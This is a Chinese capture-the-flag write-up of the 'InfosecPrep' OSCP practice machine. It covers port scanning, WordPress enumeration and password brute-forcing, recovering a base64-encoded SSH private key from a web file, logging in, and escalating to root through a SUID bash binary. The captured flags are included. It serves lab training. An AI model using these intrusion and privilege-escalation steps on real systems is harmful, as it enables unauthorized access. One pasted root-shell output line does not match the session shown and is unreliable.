OSCP系列靶场-Esay-InfosecPrep

获网安教程

免费&进群

  

本文由掌控安全学院 - 杳若投稿

总结

getwebshell → 通过目录扫描得到robots.txt端点 → robots.txt存在敏感目录 → 访问敏感目录得到base64加密信息 → 解密得到ssh密钥 → 信息收集得到用户名 → 免密ssh登录

提 权 思 路 → 内网信息收集 → suid-bash直接提权

准备工作

• 启动VPN
  获取攻击机IP → 192.168.45.206

• 启动靶机
  获取目标机器IP → 192.168.152.89

信息收集-端口扫描

目标开放端口收集

• Nmap开放端口扫描2次

sudo nmap --min-rate 10000-p-192.168.152.89
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

开放的端口-→22,80,33060

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p22,80,33060192.168.152.89
PORT      STATE SERVICE VERSION                                
22/tcp    open  ssh     OpenSSH8.2p1Ubuntu4ubuntu0.1(Ubuntu
80/tcp    open  http    Apache httpd 2.4.41((Ubuntu))

信息收集-端口测试

22-SSH端口的信息收集

通过Nmap探测获得SSH的版本信息，可以尝试利用
探测版本为OpenSSH 8.2p1 Ubuntu 4ubuntu0.1

# 搜索对应脚本
msf6 → searchsploit OpenSSH8.2p1

无相关漏洞详情

通过Nmap探测获得SSH的版本信息，在获取到某个用户名之后尝试

ssh root @192.168.152.89-v

显示publickey就是只支持密钥登录

80-HTTP端口的信息收集

访问 http://192.168.152.89:80 像一个cms进行指纹搜集

whatweb http://192.168.152.89:80

版本号也报了出来，优先尝试通用漏洞 WordPress 5.4.2

searchsploit WordPress5.4.2

发现需要插件

因为cms的原因，针对wordpress的专用扫描器

# -e枚举 ap枚举插件 u枚举用户名 t枚举主题
wpscan --url http://192.168.152.89:80 --enumerate ap,u,t

通过爆破发现了用户名admin

发现一些没什么大危害的漏洞

# 暴力破解admin密码
wpscan --url http://192.168.152.89:80 -U admin -P /usr/share/wordlists/rockyou.txt

这边挂着我们去研究其他内容

# 包括文章中是否写明一些敏感信息
curl http://192.168.152.89:80

无隐藏信息

信息收集-目录扫描初步

dirsearch -u http://192.168.152.89:80 -x 302,403

因为扫出了目录，深层次的扫描待选

信息收集-目录扫描(后缀)
信息收集-目录扫描(深度/大字典)
信息收集-目录扫描(深度/大字典后缀)

/robots.txt端点

访问后得到了一个新的端点/secret.txt

/secret.txt端点

得到了一串代码，带 == 推测是base64

base64解密

curl http://192.168.152.89:80/secret.txt | base64 -d

解密之后发现是私钥

curl http://192.168.152.89:80/secret.txt | base64 -d → is_rsa

将其保存成一个文件is_rsa方便后续利用

其他端点

另外端点是wp的端点，因为发现了私钥，所以先待定

33060端口的信息收集

从nmap探测知道是一个mysqlx与mysql数据库应该有一定的关联
不过从80端口我们已经获取了进入的key，就不探究33060端口了

漏洞利用-getwebshell

利用root连接私钥(失败)

获取了ssh免密登录的私钥后以为是root的，我飘了

sudo ssh -i is_rsa root @192.168.152.89-p22

root用户不能私钥登录

利用admin连接私钥(失败)

想到了wpscan收集到的admin用户

sudo ssh -i is_rsa admin @192.168.152.89-p22

也不行 G!

爆破用户名(好像没有这工具)

我以为可以用hyrda在已知私钥的情况下爆破用户名，好像没这个命令。

遗漏的信息收集

我傻了，网站官方上写明了

Oh yea!Almost forgot the only user on this box is“oscp”.

唯一的用户是oscp

可以尝试利用oscp进行爆破

ssh私钥登录

sudo ssh -i is_rsa oscp @192.168.152.89-p22

ohhhh 能进去但是我权限开大了

chmod 600 is_rsa
sudo ssh -i is_rsa oscp @192.168.152.89-p22

内网遨游-getshell

FLAG1获取

-bash-5.0$ find /-name local.txt 2→/dev/null
/home/oscp/local.txt
-bash-5.0$ cat /home/oscp/local.txt
10c23c2c5f69e180a3970f10b2a236ef

信息收集-内网基础信息收集

提权的本质在于枚举，在获取shell之后我们要进行内网信息的收集，都是为了提权做准备

较老的Ubuntu以及Linux系统可以overlayfs提权

# 确定发行版本
-bash-5.0$ lsb_release -a
No LSB modules are available.
Distributor ID:Ubuntu
Description:Ubuntu20.04 LTS
Release:20.04
Codename:       focal

发行版本为Ubuntu 20.04，不太能overlayfs提权

较低的内核版本可以进行脏牛提权

-bash-5.0$ uname -a
Linux oscp 5.4.0-40-generic#44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

内核版本为5.4.0

查找具有sudo权限，且不需要密码的可提权文件
如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

# 利用sudo -l寻找
sudo -l

发现需要密码

如果发现u=s有东西的话 访问 https://gtfobins.github.io 寻找

# -perm 文件权限
find /-perm -u=s -type f 2→/dev/null
/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

虽然多，重点关注/usr目录下发现了bash直接会心一笑

权限提升

通过查找使用上述命令将直接提权

以下命令将以root身份打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

提权成功

FLAG2获取

bash-5.0# cat /root/proof.txt
abb2ed5f2c5147f3881508eaade611db

完结撒花~

反思

当我通关提权了，wpscan还在扫描，应该用cewl生成字典较好，不然太多了

以后应该把网站上的信息收集加入进来

密钥可以再次base64，密钥的格式为

-----BEGIN OPENSSH PRIVATE KEY-----
内容
-----END OPENSSH PRIVATE KEY-----

# 针对内容再次base64解密也可以得到用户名
cat test.txt | baes64 -d

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，

所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

没看够~？欢迎关注！

分享本文到朋友圈，可以凭截图找老师领取

上千教程+工具+交流群+靶场账号哦

分享后扫码加我！

回顾往期内容

Xray挂机刷漏洞

零基础学黑客，该怎么学？

网络安全人员必考的几本证书！

文库｜内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转，没有封禁的IP！

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力